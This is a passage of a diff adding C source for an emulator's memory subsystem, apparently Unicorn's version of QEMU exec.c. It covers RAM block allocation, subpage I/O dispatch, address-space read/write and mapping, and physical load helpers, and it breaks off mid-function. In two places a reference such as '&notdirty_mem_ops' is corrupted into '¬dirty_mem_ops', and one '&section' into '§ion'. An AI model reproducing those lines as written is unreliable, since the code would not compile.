dispatch_listener); + AddressSpaceDispatch *d = as->next_dispatch; + MemoryRegionSection now = *section, remain = *section; + Int128 page_size = int128_make64(TARGET_PAGE_SIZE); + + if (now.offset_within_address_space & ~TARGET_PAGE_MASK) { + uint64_t left = TARGET_PAGE_ALIGN(now.offset_within_address_space) + - now.offset_within_address_space; + + now.size = int128_min(int128_make64(left), now.size); + register_subpage(as->uc, d, &now); + } else { + now.size = int128_zero(); + } + while (int128_ne(remain.size, now.size)) { + remain.size = int128_sub(remain.size, now.size); + remain.offset_within_address_space += int128_get64(now.size); + remain.offset_within_region += int128_get64(now.size); + now = remain; + if (int128_lt(remain.size, page_size)) { + register_subpage(as->uc, d, &now); + } else if (remain.offset_within_address_space & ~TARGET_PAGE_MASK) { + now.size = page_size; + register_subpage(as->uc, d, &now); + } else { + now.size = int128_and(now.size, int128_neg(page_size)); + register_multipage(d, &now); + } + } +} + +#ifdef __linux__ + +#include <sys/vfs.h> + +#define HUGETLBFS_MAGIC 0x958458f6 + +#endif + +static ram_addr_t find_ram_offset(struct uc_struct *uc, ram_addr_t size) +{ + RAMBlock *block, *next_block; + ram_addr_t offset = RAM_ADDR_MAX, mingap = RAM_ADDR_MAX; + + assert(size != 0); /* it would hand out same offset multiple times */ + + if (QTAILQ_EMPTY(&uc->ram_list.blocks)) + return 0; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + ram_addr_t end, next = RAM_ADDR_MAX; + + end = block->offset + block->length; + + QTAILQ_FOREACH(next_block, &uc->ram_list.blocks, next) { + if (next_block->offset >= end) { + next = MIN(next, next_block->offset); + } + } + if (next - end >= size && next - end < mingap) { + offset = end; + mingap = next - end; + } + } + + if (offset == RAM_ADDR_MAX) { + fprintf(stderr, "Failed to find gap of requested size: %" PRIu64 "\n", + (uint64_t)size); + abort(); + } + + return offset; +} + +ram_addr_t last_ram_offset(struct uc_struct *uc) +{ + RAMBlock *block; + ram_addr_t last = 0; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) + last = MAX(last, block->offset + block->length); + + return last; +} + +static void qemu_ram_setup_dump(void *addr, ram_addr_t size) +{ +} + +static RAMBlock *find_ram_block(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (block->offset == addr) { + return block; + } + } + + return NULL; +} + +void qemu_ram_unset_idstr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = find_ram_block(uc, addr); + + if (block) { + memset(block->idstr, 0, sizeof(block->idstr)); + } +} + +static int memory_try_enable_merging(void *addr, size_t len) +{ + return 0; +} + +static ram_addr_t ram_block_add(struct uc_struct *uc, RAMBlock *new_block, Error **errp) +{ + RAMBlock *block; + ram_addr_t old_ram_size, new_ram_size; + + old_ram_size = last_ram_offset(uc) >> TARGET_PAGE_BITS; + + new_block->offset = find_ram_offset(uc, new_block->length); + + if (!new_block->host) { + new_block->host = phys_mem_alloc(new_block->length, + &new_block->mr->align); + if (!new_block->host) { + error_setg_errno(errp, errno, + "cannot set up guest memory '%s'", + memory_region_name(new_block->mr)); + return -1; + } + memory_try_enable_merging(new_block->host, new_block->length); + } + + /* Keep the list sorted from biggest to smallest block. */ + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (block->length < new_block->length) { + break; + } + } + if (block) { + QTAILQ_INSERT_BEFORE(block, new_block, next); + } else { + QTAILQ_INSERT_TAIL(&uc->ram_list.blocks, new_block, next); + } + uc->ram_list.mru_block = NULL; + + uc->ram_list.version++; + + new_ram_size = last_ram_offset(uc) >> TARGET_PAGE_BITS; + + if (new_ram_size > old_ram_size) { + int i; + for (i = 0; i < DIRTY_MEMORY_NUM; i++) { + uc->ram_list.dirty_memory[i] = + bitmap_zero_extend(uc->ram_list.dirty_memory[i], + old_ram_size, new_ram_size); + } + } + cpu_physical_memory_set_dirty_range(uc, new_block->offset, new_block->length); + + qemu_ram_setup_dump(new_block->host, new_block->length); + //qemu_madvise(new_block->host, new_block->length, QEMU_MADV_HUGEPAGE); + //qemu_madvise(new_block->host, new_block->length, QEMU_MADV_DONTFORK); + + return new_block->offset; +} + +// return -1 on error +ram_addr_t qemu_ram_alloc_from_ptr(ram_addr_t size, void *host, + MemoryRegion *mr, Error **errp) +{ + RAMBlock *new_block; + ram_addr_t addr; + Error *local_err = NULL; + + size = TARGET_PAGE_ALIGN(size); + new_block = g_malloc0(sizeof(*new_block)); + if (new_block == NULL) + return -1; + + new_block->mr = mr; + new_block->length = size; + new_block->fd = -1; + new_block->host = host; + if (host) { + new_block->flags |= RAM_PREALLOC; + } + addr = ram_block_add(mr->uc, new_block, &local_err); + if (local_err) { + g_free(new_block); + error_propagate(errp, local_err); + return -1; + } + return addr; +} + +ram_addr_t qemu_ram_alloc(ram_addr_t size, MemoryRegion *mr, Error **errp) +{ + return qemu_ram_alloc_from_ptr(size, NULL, mr, errp); +} + +void qemu_ram_free_from_ptr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr == block->offset) { + QTAILQ_REMOVE(&uc->ram_list.blocks, block, next); + uc->ram_list.mru_block = NULL; + uc->ram_list.version++; + g_free(block); + break; + } + } +} + +void qemu_ram_free(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr == block->offset) { + QTAILQ_REMOVE(&uc->ram_list.blocks, block, next); + uc->ram_list.mru_block = NULL; + uc->ram_list.version++; + if (block->flags & RAM_PREALLOC) { + ; +#ifndef _WIN32 + } else if (block->fd >= 0) { + munmap(block->host, block->length); + close(block->fd); +#endif + } else { + qemu_anon_ram_free(block->host, block->length); + } + g_free(block); + break; + } + } +} + +#ifndef _WIN32 +void qemu_ram_remap(struct uc_struct *uc, ram_addr_t addr, ram_addr_t length) +{ + RAMBlock *block; + ram_addr_t offset; + int flags; + void *area, *vaddr; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + offset = addr - block->offset; + if (offset < block->length) { + vaddr = block->host + offset; + if (block->flags & RAM_PREALLOC) { + ; + } else { + flags = MAP_FIXED; + munmap(vaddr, length); + if (block->fd >= 0) { + flags |= (block->flags & RAM_SHARED ? + MAP_SHARED : MAP_PRIVATE); + area = mmap(vaddr, length, PROT_READ | PROT_WRITE, + flags, block->fd, offset); + } else { + /* + * Remap needs to match alloc. Accelerators that + * set phys_mem_alloc never remap. If they did, + * we'd need a remap hook here. + */ + assert(phys_mem_alloc == qemu_anon_ram_alloc); + + flags |= MAP_PRIVATE | MAP_ANONYMOUS; + area = mmap(vaddr, length, PROT_READ | PROT_WRITE, + flags, -1, 0); + } + if (area == MAP_FAILED || area != vaddr) { + fprintf(stderr, "Could not remap addr: " + RAM_ADDR_FMT "@" RAM_ADDR_FMT "\n", + length, addr); + exit(1); + } + memory_try_enable_merging(vaddr, length); + qemu_ram_setup_dump(vaddr, length); + } + return; + } + } +} +#endif /* !_WIN32 */ + +int qemu_get_ram_fd(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = qemu_get_ram_block(uc, addr); + + return block->fd; +} + +void *qemu_get_ram_block_host_ptr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = qemu_get_ram_block(uc, addr); + + return block->host; +} + +/* Return a host pointer to ram allocated with qemu_ram_alloc. + With the exception of the softmmu code in this file, this should + only be used for local memory (e.g. video ram) that the device owns, + and knows it isn't going to access beyond the end of the block. + + It should not be used for general purpose DMA. + Use cpu_physical_memory_map/cpu_physical_memory_rw instead. + */ +void *qemu_get_ram_ptr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = qemu_get_ram_block(uc, addr); + + return block->host + (addr - block->offset); +} + +/* Return a host pointer to guest's ram. Similar to qemu_get_ram_ptr + * but takes a size argument */ +static void *qemu_ram_ptr_length(struct uc_struct *uc, ram_addr_t addr, hwaddr *size) +{ + RAMBlock *block; + if (*size == 0) { + return NULL; + } + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr - block->offset < block->length) { + if (addr - block->offset + *size > block->length) + *size = block->length - addr + block->offset; + return block->host + (addr - block->offset); + } + } + + fprintf(stderr, "Bad ram offset %" PRIx64 "\n", (uint64_t)addr); + abort(); +} + +/* Some of the softmmu routines need to translate from a host pointer + (typically a TLB entry) back to a ram offset. */ +MemoryRegion *qemu_ram_addr_from_host(struct uc_struct *uc, void *ptr, ram_addr_t *ram_addr) +{ + RAMBlock *block; + uint8_t *host = ptr; + + block = uc->ram_list.mru_block; + if (block && block->host && host - block->host < block->length) { + goto found; + } + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + /* This case append when the block is not mapped. */ + if (block->host == NULL) { + continue; + } + if (host - block->host < block->length) { + goto found; + } + } + + return NULL; + +found: + *ram_addr = block->offset + (host - block->host); + return block->mr; +} + +static uint64_t subpage_read(struct uc_struct* uc, void *opaque, hwaddr addr, + unsigned len) +{ + subpage_t *subpage = opaque; + uint8_t buf[4]; + +#if defined(DEBUG_SUBPAGE) + printf("%s: subpage %p len %u addr " TARGET_FMT_plx "\n", __func__, + subpage, len, addr); +#endif + address_space_read(subpage->as, addr + subpage->base, buf, len); + switch (len) { + case 1: + return ldub_p(buf); + case 2: + return lduw_p(buf); + case 4: + return ldl_p(buf); + default: + abort(); + } +} + +static void subpage_write(struct uc_struct* uc, void *opaque, hwaddr addr, + uint64_t value, unsigned len) +{ + subpage_t *subpage = opaque; + uint8_t buf[4]; + +#if defined(DEBUG_SUBPAGE) + printf("%s: subpage %p len %u addr " TARGET_FMT_plx + " value %"PRIx64"\n", + __func__, subpage, len, addr, value); +#endif + switch (len) { + case 1: + stb_p(buf, value); + break; + case 2: + stw_p(buf, value); + break; + case 4: + stl_p(buf, value); + break; + default: + abort(); + } + address_space_write(subpage->as, addr + subpage->base, buf, len); +} + +static bool subpage_accepts(void *opaque, hwaddr addr, + unsigned len, bool is_write) +{ + subpage_t *subpage = opaque; +#if defined(DEBUG_SUBPAGE) + printf("%s: subpage %p %c len %u addr " TARGET_FMT_plx "\n", + __func__, subpage, is_write ? 'w' : 'r', len, addr); +#endif + + return address_space_access_valid(subpage->as, addr + subpage->base, + len, is_write); +} + +static const MemoryRegionOps subpage_ops = { + subpage_read, + subpage_write, + DEVICE_NATIVE_ENDIAN, + { + 0, 0, false, subpage_accepts, + }, +}; + +static int subpage_register (subpage_t *mmio, uint32_t start, uint32_t end, + uint16_t section) +{ + int idx, eidx; + + if (start >= TARGET_PAGE_SIZE || end >= TARGET_PAGE_SIZE) + return -1; + idx = SUBPAGE_IDX(start); + eidx = SUBPAGE_IDX(end); +#if defined(DEBUG_SUBPAGE) + printf("%s: %p start %08x end %08x idx %08x eidx %08x section %d\n", + __func__, mmio, start, end, idx, eidx, section); +#endif + for (; idx <= eidx; idx++) { + mmio->sub_section[idx] = section; + } + + return 0; +} + +static void notdirty_mem_write(struct uc_struct* uc, void *opaque, hwaddr ram_addr, + uint64_t val, unsigned size) +{ + if (!cpu_physical_memory_get_dirty_flag(uc, ram_addr, DIRTY_MEMORY_CODE)) { + tb_invalidate_phys_page_fast(uc, ram_addr, size); + } + switch (size) { + case 1: + stb_p(qemu_get_ram_ptr(uc, ram_addr), val); + break; + case 2: + stw_p(qemu_get_ram_ptr(uc, ram_addr), val); + break; + case 4: + stl_p(qemu_get_ram_ptr(uc, ram_addr), val); + break; + default: + abort(); + } + /* we remove the notdirty callback only if the code has been + flushed */ + if (!cpu_physical_memory_is_clean(uc, ram_addr)) { + CPUArchState *env = uc->current_cpu->env_ptr; + tlb_set_dirty(env, uc->current_cpu->mem_io_vaddr); + } +} + +static bool notdirty_mem_accepts(void *opaque, hwaddr addr, + unsigned size, bool is_write) +{ + return is_write; +} + +static const MemoryRegionOps notdirty_mem_ops = { + NULL, + notdirty_mem_write, + DEVICE_NATIVE_ENDIAN, + { + 0, 0, false, notdirty_mem_accepts, + }, +}; + +static void io_mem_init(struct uc_struct* uc) +{ + memory_region_init_io(uc, &uc->io_mem_rom, NULL, &unassigned_mem_ops, NULL, NULL, UINT64_MAX); + memory_region_init_io(uc, &uc->io_mem_unassigned, NULL, &unassigned_mem_ops, NULL, + NULL, UINT64_MAX); + memory_region_init_io(uc, &uc->io_mem_notdirty, NULL, ¬dirty_mem_ops, NULL, + NULL, UINT64_MAX); + //memory_region_init_io(uc, &uc->io_mem_watch, NULL, &watch_mem_ops, NULL, + // NULL, UINT64_MAX); +} + +static subpage_t *subpage_init(AddressSpace *as, hwaddr base) +{ + subpage_t *mmio; + + mmio = g_malloc0(sizeof(subpage_t)); + + mmio->as = as; + mmio->base = base; + memory_region_init_io(as->uc, &mmio->iomem, NULL, &subpage_ops, mmio, + NULL, TARGET_PAGE_SIZE); + mmio->iomem.subpage = true; +#if defined(DEBUG_SUBPAGE) + printf("%s: %p base " TARGET_FMT_plx " len %08x\n", __func__, + mmio, base, TARGET_PAGE_SIZE); +#endif + subpage_register(mmio, 0, TARGET_PAGE_SIZE-1, PHYS_SECTION_UNASSIGNED); + + return mmio; +} + +static uint16_t dummy_section(PhysPageMap *map, AddressSpace *as, + MemoryRegion *mr) +{ + MemoryRegionSection section = MemoryRegionSection_make( + mr, as, 0, + int128_2_64(), + false, + 0 + ); + + assert(as); + + return phys_section_add(map, §ion); +} + +MemoryRegion *iotlb_to_region(AddressSpace *as, hwaddr index) +{ + return as->dispatch->map.sections[index & ~TARGET_PAGE_MASK].mr; +} + +void phys_mem_clean(struct uc_struct* uc) +{ + AddressSpaceDispatch* d = uc->as.next_dispatch; + g_free(d->map.sections); +} + +static void mem_begin(MemoryListener *listener) +{ + AddressSpace *as = container_of(listener, AddressSpace, dispatch_listener); + AddressSpaceDispatch *d = g_new0(AddressSpaceDispatch, 1); + uint16_t n; + PhysPageEntry ppe = { 1, PHYS_MAP_NODE_NIL }; + struct uc_struct *uc = as->uc; + + n = dummy_section(&d->map, as, &uc->io_mem_unassigned); + assert(n == PHYS_SECTION_UNASSIGNED); + n = dummy_section(&d->map, as, &uc->io_mem_notdirty); + assert(n == PHYS_SECTION_NOTDIRTY); + n = dummy_section(&d->map, as, &uc->io_mem_rom); + assert(n == PHYS_SECTION_ROM); + // n = dummy_section(&d->map, as, &uc->io_mem_watch); + // assert(n == PHYS_SECTION_WATCH); + + d->phys_map = ppe; + d->as = as; + as->next_dispatch = d; +} + +static void mem_commit(MemoryListener *listener) +{ + AddressSpace *as = container_of(listener, AddressSpace, dispatch_listener); + AddressSpaceDispatch *cur = as->dispatch; + AddressSpaceDispatch *next = as->next_dispatch; + + phys_page_compact_all(next, next->map.nodes_nb); + + as->dispatch = next; + + if (cur) { + phys_sections_free(&cur->map); + g_free(cur); + } +} + +static void tcg_commit(MemoryListener *listener) +{ + struct uc_struct* uc = listener->address_space_filter->uc; + + /* since each CPU stores ram addresses in its TLB cache, we must + reset the modified entries */ + /* XXX: slow ! */ + tlb_flush(uc->cpu, 1); +} + +void address_space_init_dispatch(AddressSpace *as) +{ + MemoryListener ml = { 0 }; + + ml.begin = mem_begin; + ml.commit = mem_commit; + ml.region_add = mem_add; + ml.region_nop = mem_add; + ml.priority = 0; + + as->dispatch = NULL; + as->dispatch_listener = ml; + memory_listener_register(as->uc, &as->dispatch_listener, as); +} + +void address_space_unregister(AddressSpace *as) +{ + memory_listener_unregister(as->uc, &as->dispatch_listener); +} + +void address_space_destroy_dispatch(AddressSpace *as) +{ + AddressSpaceDispatch *d = as->dispatch; + + memory_listener_unregister(as->uc, &as->dispatch_listener); + g_free(d->map.nodes); + g_free(d); + + if (as->dispatch != as->next_dispatch) { + d = as->next_dispatch; + g_free(d->map.nodes); + g_free(d); + } + + as->dispatch = NULL; + as->next_dispatch = NULL; +} + +static void memory_map_init(struct uc_struct *uc) +{ + uc->system_memory = g_malloc(sizeof(*(uc->system_memory))); + + memory_region_init(uc, uc->system_memory, NULL, "system", UINT64_MAX); + address_space_init(uc, &uc->as, uc->system_memory, "memory"); +} + +void cpu_exec_init_all(struct uc_struct *uc) +{ +#if !defined(CONFIG_USER_ONLY) + memory_map_init(uc); +#endif + io_mem_init(uc); +} + +MemoryRegion *get_system_memory(struct uc_struct *uc) +{ + return uc->system_memory; +} + +#endif /* !defined(CONFIG_USER_ONLY) */ + +/* physical memory access (slow version, mainly for debug) */ +#if defined(CONFIG_USER_ONLY) +int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, + uint8_t *buf, int len, int is_write) +{ + int l, flags; + target_ulong page; + void * p; + + while (len > 0) { + page = addr & TARGET_PAGE_MASK; + l = (page + TARGET_PAGE_SIZE) - addr; + if (l > len) + l = len; + flags = page_get_flags(page); + if (!(flags & PAGE_VALID)) + return -1; + if (is_write) { + if (!(flags & PAGE_WRITE)) + return -1; + /* XXX: this code should not depend on lock_user */ + if (!(p = lock_user(VERIFY_WRITE, addr, l, 0))) + return -1; + memcpy(p, buf, l); + unlock_user(p, addr, l); + } else { + if (!(flags & PAGE_READ)) + return -1; + /* XXX: this code should not depend on lock_user */ + if (!(p = lock_user(VERIFY_READ, addr, l, 1))) + return -1; + memcpy(buf, p, l); + unlock_user(p, addr, 0); + } + len -= l; + buf += l; + addr += l; + } + return 0; +} + +#else + +static void invalidate_and_set_dirty(struct uc_struct *uc, hwaddr addr, + hwaddr length) +{ + if (cpu_physical_memory_range_includes_clean(uc, addr, length)) { + tb_invalidate_phys_range(uc, addr, addr + length, 0); + } +} + +static int memory_access_size(MemoryRegion *mr, unsigned l, hwaddr addr) +{ + unsigned access_size_max = mr->ops->valid.max_access_size; + + /* Regions are assumed to support 1-4 byte accesses unless + otherwise specified. */ + if (access_size_max == 0) { + access_size_max = 4; + } + + /* Bound the maximum access by the alignment of the address. */ + if (!mr->ops->impl.unaligned) { + unsigned align_size_max = addr & (0-addr); + if (align_size_max != 0 && align_size_max < access_size_max) { + access_size_max = align_size_max; + } + } + + /* Don't attempt accesses larger than the maximum. */ + if (l > access_size_max) { + l = access_size_max; + } + if (l & (l - 1)) { + l = 1 << (qemu_fls(l) - 1); + } + + return l; +} + +bool address_space_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, bool is_write) +{ + hwaddr l; + uint8_t *ptr; + uint64_t val; + hwaddr addr1; + MemoryRegion *mr; + bool error = false; + + while (len > 0) { + l = len; + + mr = address_space_translate(as, addr, &addr1, &l, is_write); + if (!mr) + return true; + + if (is_write) { + if (!memory_access_is_direct(mr, is_write)) { + l = memory_access_size(mr, l, addr1); + /* XXX: could force current_cpu to NULL to avoid + potential bugs */ + switch (l) { + case 8: + /* 64 bit write access */ + val = ldq_p(buf); + error |= io_mem_write(mr, addr1, val, 8); + break; + case 4: + /* 32 bit write access */ + val = ldl_p(buf); + error |= io_mem_write(mr, addr1, val, 4); + break; + case 2: + /* 16 bit write access */ + val = lduw_p(buf); + error |= io_mem_write(mr, addr1, val, 2); + break; + case 1: + /* 8 bit write access */ + val = ldub_p(buf); + error |= io_mem_write(mr, addr1, val, 1); + break; + default: + abort(); + } + } else { + addr1 += memory_region_get_ram_addr(mr); + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, addr1); + memcpy(ptr, buf, l); + invalidate_and_set_dirty(as->uc, addr1, l); + } + } else { + if (!memory_access_is_direct(mr, is_write)) { + /* I/O case */ + l = memory_access_size(mr, l, addr1); + + switch (l) { + case 8: + /* 64 bit read access */ + error |= io_mem_read(mr, addr1, &val, 8); + stq_p(buf, val); + break; + case 4: + /* 32 bit read access */ + error |= io_mem_read(mr, addr1, &val, 4); + stl_p(buf, val); + break; + case 2: + /* 16 bit read access */ + error |= io_mem_read(mr, addr1, &val, 2); + stw_p(buf, val); + break; + case 1: + /* 8 bit read access */ + error |= io_mem_read(mr, addr1, &val, 1); + stb_p(buf, val); + break; + default: + abort(); + } + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, mr->ram_addr + addr1); + memcpy(buf, ptr, l); + } + } + len -= l; + buf += l; + addr += l; + } + + return error; +} + +bool address_space_write(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len) +{ + return address_space_rw(as, addr, (uint8_t *)buf, len, true); +} + +bool address_space_read(AddressSpace *as, hwaddr addr, uint8_t *buf, int len) +{ + return address_space_rw(as, addr, buf, len, false); +} + + +bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, int is_write) +{ + return address_space_rw(as, addr, buf, len, is_write); +} + +enum write_rom_type { + WRITE_DATA, + FLUSH_CACHE, +}; + +static inline void cpu_physical_memory_write_rom_internal(AddressSpace *as, + hwaddr addr, const uint8_t *buf, int len, enum write_rom_type type) +{ + hwaddr l; + uint8_t *ptr; + hwaddr addr1; + MemoryRegion *mr; + + while (len > 0) { + l = len; + mr = address_space_translate(as, addr, &addr1, &l, true); + + if (!(memory_region_is_ram(mr) || + memory_region_is_romd(mr))) { + /* do nothing */ + } else { + addr1 += memory_region_get_ram_addr(mr); + /* ROM/RAM case */ + ptr = qemu_get_ram_ptr(as->uc, addr1); + switch (type) { + case WRITE_DATA: + memcpy(ptr, buf, l); + invalidate_and_set_dirty(as->uc, addr1, l); + break; + case FLUSH_CACHE: + flush_icache_range((uintptr_t)ptr, (uintptr_t)ptr + l); + break; + } + } + len -= l; + buf += l; + addr += l; + } +} + +/* used for ROM loading : can write in RAM and ROM */ +DEFAULT_VISIBILITY +void cpu_physical_memory_write_rom(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len) +{ + cpu_physical_memory_write_rom_internal(as, addr, buf, len, WRITE_DATA); +} + +void cpu_flush_icache_range(AddressSpace *as, hwaddr start, int len) +{ + /* + * This function should do the same thing as an icache flush that was + * triggered from within the guest. For TCG we are always cache coherent, + * so there is no need to flush anything. For KVM / Xen we need to flush + * the host's instruction cache at least. + */ + if (tcg_enabled(as->uc)) { + return; + } + + cpu_physical_memory_write_rom_internal(as, + start, NULL, len, FLUSH_CACHE); +} + + +bool address_space_access_valid(AddressSpace *as, hwaddr addr, int len, bool is_write) +{ + MemoryRegion *mr; + hwaddr l, xlat; + + while (len > 0) { + l = len; + mr = address_space_translate(as, addr, &xlat, &l, is_write); + if (!memory_access_is_direct(mr, is_write)) { + l = memory_access_size(mr, l, addr); + if (!memory_region_access_valid(mr, xlat, l, is_write)) { + return false; + } + } + + len -= l; + addr += l; + } + return true; +} + +/* Map a physical memory region into a host virtual address. + * May map a subset of the requested range, given by and returned in *plen. + * May return NULL if resources needed to perform the mapping are exhausted. + * Use only for reads OR writes - not for read-modify-write operations. + * Use cpu_register_map_client() to know when retrying the map operation is + * likely to succeed. + */ +void *address_space_map(AddressSpace *as, + hwaddr addr, + hwaddr *plen, + bool is_write) +{ + hwaddr len = *plen; + hwaddr done = 0; + hwaddr l, xlat, base; + MemoryRegion *mr, *this_mr; + ram_addr_t raddr; + + if (len == 0) { + return NULL; + } + + l = len; + mr = address_space_translate(as, addr, &xlat, &l, is_write); + if (!memory_access_is_direct(mr, is_write)) { + if (as->uc->bounce.buffer) { + return NULL; + } + /* Avoid unbounded allocations */ + l = MIN(l, TARGET_PAGE_SIZE); + as->uc->bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l); + as->uc->bounce.addr = addr; + as->uc->bounce.len = l; + + memory_region_ref(mr); + as->uc->bounce.mr = mr; + if (!is_write) { + address_space_read(as, addr, as->uc->bounce.buffer, l); + } + + *plen = l; + return as->uc->bounce.buffer; + } + + base = xlat; + raddr = memory_region_get_ram_addr(mr); + + for (;;) { + len -= l; + addr += l; + done += l; + if (len == 0) { + break; + } + + l = len; + this_mr = address_space_translate(as, addr, &xlat, &l, is_write); + if (this_mr != mr || xlat != base + done) { + break; + } + } + + memory_region_ref(mr); + *plen = done; + return qemu_ram_ptr_length(as->uc, raddr + base, plen); +} + +/* Unmaps a memory region previously mapped by address_space_map(). + * Will also mark the memory as dirty if is_write == 1. access_len gives + * the amount of memory that was actually read or written by the caller. + */ +void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len) +{ + if (buffer != as->uc->bounce.buffer) { + MemoryRegion *mr; + ram_addr_t addr1; + + mr = qemu_ram_addr_from_host(as->uc, buffer, &addr1); + assert(mr != NULL); + if (is_write) { + invalidate_and_set_dirty(as->uc, addr1, access_len); + } + memory_region_unref(mr); + return; + } + if (is_write) { + address_space_write(as, as->uc->bounce.addr, as->uc->bounce.buffer, access_len); + } + qemu_vfree(as->uc->bounce.buffer); + as->uc->bounce.buffer = NULL; + memory_region_unref(as->uc->bounce.mr); +} + +void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, + hwaddr *plen, + int is_write) +{ + return address_space_map(as, addr, plen, is_write); +} + +void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len) +{ + address_space_unmap(as, buffer, len, is_write, access_len); +} + +/* warning: addr must be aligned */ +static inline uint32_t ldl_phys_internal(AddressSpace *as, hwaddr addr, + enum device_endian endian) +{ + uint8_t *ptr; + uint64_t val; + MemoryRegion *mr; + hwaddr l = 4; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, false); + if (l < 4 || !memory_access_is_direct(mr, false)) { + /* I/O case */ + io_mem_read(mr, addr1, &val, 4); +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap32(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap32(val); + } +#endif + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, (memory_region_get_ram_addr(mr) + & TARGET_PAGE_MASK) + + addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + val = ldl_le_p(ptr); + break; + case DEVICE_BIG_ENDIAN: + val = ldl_be_p(ptr); + break; + default: + val = ldl_p(ptr); + break; + } + } + return val; +} + +uint32_t ldl_phys(AddressSpace *as, hwaddr addr) +{ + return ldl_phys_internal(as, addr, DEVICE_NATIVE_ENDIAN); +} + +uint32_t ldl_le_phys(AddressSpace *as, hwaddr addr) +{ + return ldl_phys_internal(as, addr, DEVICE_LITTLE_ENDIAN); +} + +uint32_t ldl_be_phys(AddressSpace *as, hwaddr addr) +{ + return ldl_phys_internal(as, addr, DEVICE_BIG_ENDIAN); +} + +/* warning: addr must be aligned */ +static inline uint64_t ldq_phys_internal(AddressSpace *as, hwaddr addr, + enum device_endian endian) +{ + uint8_t *ptr; + uint64_t val; + MemoryRegion *mr; + hwaddr l = 8; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + false); + if (l < 8 || !memory_access_is_direct(mr, false)) { + /* I/O case */ + io_mem_read(mr, addr1, &val, 8); +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap64(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap64(val); + } +#endif + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, (memory_region_get_ram_addr(mr) + & TARGET_PAGE_MASK) + + addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + val = ldq_le_p(ptr); + break; + case DEVICE_BIG_ENDIAN: + val = ldq_be_p(ptr); + break; + default: + val = ldq_p(ptr); + break; + } + } + return val; +} + +uint64_t ldq_phys(AddressSpace *as, hwaddr addr) +{ + return ldq_phys_internal(as, addr, DEVICE_NATIVE_ENDIAN); +} + +uint64_t ldq_le_phys(AddressSpace *as, hwaddr addr) +{ + return ldq_phys_internal(as, addr, DEVICE_LITTLE_ENDIAN); +} + +uint64_t ldq_be_phys(AddressSpace *as, hwaddr addr) +{ + return ldq_phys_internal(as, addr, DEVICE_BIG_ENDIAN); +} + +/* XXX: optimize */ +uint32_t ldub_phys(AddressSpace *as, hwaddr addr) +{ + uint8_t val; + address_space_rw(as, addr, &val, 1, 0); + return val; +} + +/* warning: addr must be aligned */ +static inline uint32_t lduw_phys_internal(AddressSpace *as, hwaddr addr, + enum device_endian endian) +{ + uint8_t *ptr; + uint64_t val; + MemoryRegion *mr; + hwaddr l = 2; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + false); + if (l < 2 || !memory_access_is_direct(mr, false)) { + /* I/O case */ + io_mem_read(mr, addr1, &val, 2); +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap16(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap16(val); + } +#endif + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, (memory_region_get_ram_addr(mr) + & TARGET_PAGE_MASK) + + addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + val = lduw_le_p(ptr); + break; + case DEVICE_BIG_ENDIAN: + val = lduw_be_p(ptr); + break; + default: + val = lduw_p(ptr); + break; + } + } + return val; +} + +uint32_t lduw_phys(AddressSpace *as, hwaddr addr) +{ + return lduw_phys_internal(as, addr, DEVICE_NATIVE_ENDIAN); +} + +uint32_t lduw_le_phys(AddressSpace *as, hwaddr addr) +{ + return lduw_phys_internal(as, addr, DEVICE_LITTLE_ENDIAN); +} + +uint32_t lduw_be_phys(AddressSpace *as, hwaddr addr) +{ + return lduw_phys_internal(as, addr, DEVICE_BIG_ENDIAN); +} + +/* warning: addr must be aligned. The ram page is not masked as dirty + and the code inside is not invalidated. It is useful if the dirty + bits are used to track modified PTEs */ +void stl_phys_notdirty(AddressSpace *as, hwaddr addr, uint32_t val) +{ + uint8_t *ptr; + MemoryRegion *mr; + hwaddr l = 4; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + true); + if (l < 4 || 